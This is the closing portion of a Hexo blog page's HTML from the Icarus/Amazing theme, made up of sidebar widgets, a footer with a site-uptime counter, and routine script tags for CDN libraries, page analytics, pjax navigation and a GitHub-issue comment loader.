                                $(function (){getYiyan();$('#hitokoto').click(function(){getYiyan();})});</script></div></div></div><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">Links</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://hexo.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Hexo</span></span><span class="level-right"><span class="level-item tag">hexo.io</span></span></a></li><li><a class="level is-mobile" href="https://bulma.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Bulma</span></span><span class="level-right"><span class="level-item tag">bulma.io</span></span></a></li></ul></div></div></div><div class="card widget"><div class="card-content"><h3 class="menu-label">Latest Comment</h3><span class="body_hot_comment">Loading...Wait a Minute!</span></div></div><div class="card widget"><div class="card-content"><h3 class="menu-label">Recents</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2026-03-31T03:41:56.808Z">2026-03-31</time></p><p class="title"><a href="/2026/03/31/%E7%BA%A2%E6%97%A5/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2026-03-31T03:41:56.806Z">2026-03-31</time></p><p class="title"><a href="/2026/03/31/Victim01_042220/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2026-03-31T03:41:56.802Z">2026-03-31</time></p><p class="title"><a href="/2026/03/31/Untitled/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2026-03-31T03:41:56.799Z">2026-03-31</time></p><p class="title"><a href="/2026/03/31/p4l4nc4/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2026-03-31T03:41:56.797Z">2026-03-31</time></p><p class="title"><a href="/2026/03/31/opacity/"> </a></p></div></article></div></div><!--!--><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">Archives</h3><ul class="menu-list"><li><a class="level is-mobile is-marginless" href="/archives/2026/03/"><span class="level-start"><span class="level-item">March 2026</span></span><span class="level-end"><span class="level-item tag">8</span></span></a></li></ul></div></div></div><!--!--><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">Subscribe for updates</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="Subscribe"></div></div></form></div></div></div><!--!--><div class="column-right-shadow is-hidden-widescreen"></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="https://cdn.jsdelivr.net/gh/removeif/removeif-demo@latest/img/logo.png" alt="Hexo" height="28"></a><p class="size-small"><span>&copy; 2026 John Doe</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a> &amp; <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">Amazing</a> <br><span>© <a href="http://www.beian.miit.gov.cn/" target="_blank">川ICP备88888888号-8（测试）</a><br></span><span>© 版权说明：[本网站所有内容均收集于互联网或自己创作,<br />&nbsp;&nbsp;&nbsp;&nbsp;方便于网友与自己学习交流，如有侵权，请<a href="/message" target="_blank">留言</a>，立即处理]<br /></span><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️Site from <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> has existed <strong>" + dnum + "</strong> d <strong>" + hnum + "</strong> h <strong>" + mnum + "</strong> m <strong>" + snum + "</strong> s！❤️";
        }var now = new Date();setInterval("createTime('2018/11/11 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️Thx <strong><span id="busuanzi_value_site_uv">99+</span></strong> users <strong><span id="busuanzi_value_site_pv">99+</span></strong> visited！❤️</span></div></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/removeif/hexo-theme-amazing"><i class="fab fa-github"></i></a></p></div><div class="sideMusic"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="/js/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script><meting-js style="width: auto;height: 2000px;" server="netease" type="playlist" id="2364053447" theme="#2980b9" loop="all" autoplay="false" order="list" storageName="aplayer-setting" lrctype="0" list-max-height="400px" fixed="true"></meting-js></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" async></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.10.0/js/lightgallery.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><script>$.getScript('/js/comment-issue-data.js',function(){loadIssueData('46a9f3481b46ea0129d8','79c7c9cb847e141757d7864453bcbf89f0655b24','removeif','blog_comment',false);})</script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.js"></script><script type="text/javascript">var pjax = new Pjax({
            elements: "a",//代表点击链接就更新
            selectors: [  //代表要更新的节点
                ".section",
                "title"
            ],
            cache: true,
            cacheBust:false
        })

        function loadBusuanzi(){
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js", function () {});
        }

        function loadMathJax() { //加载mathjax
            $.getScript("//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML", function () {
                MathJax.Hub.Config({ tex2jax: { inlineMath: [['$', '$'], ['\(', '\)']] } });
                var math = document.getElementsByClassName("entry-content")[0];
                MathJax.Hub.Queue(["Typeset", MathJax.Hub, math]);
            });
        };

        // 开始 PJAX 执行的函数
        document.addEventListener('pjax:send', function () {
        });
        
        // PJAX 完成之后执行的函数，可以和上面的重载放在一起
        document.addEventListener('pjax:complete', function () {
            $(".section").css({opacity:1});
            if(true){
                $.getScript('/js/comment-issue-data.js',function(){loadIssueData('46a9f3481b46ea0129d8','79c7c9cb847e141757d7864453bcbf89f0655b24','removeif','blog_comment',false);});
            }
            if(false){
                loadMathJax();
            }
            loadMainJs(jQuery, window.moment, window.ClipboardJS, window.IcarusThemeSettings);
            loadBackTop();
            loadBusuanzi();
            if(typeof loadBanner == 'function'){
                loadBanner();
            }
        });</script></body></html>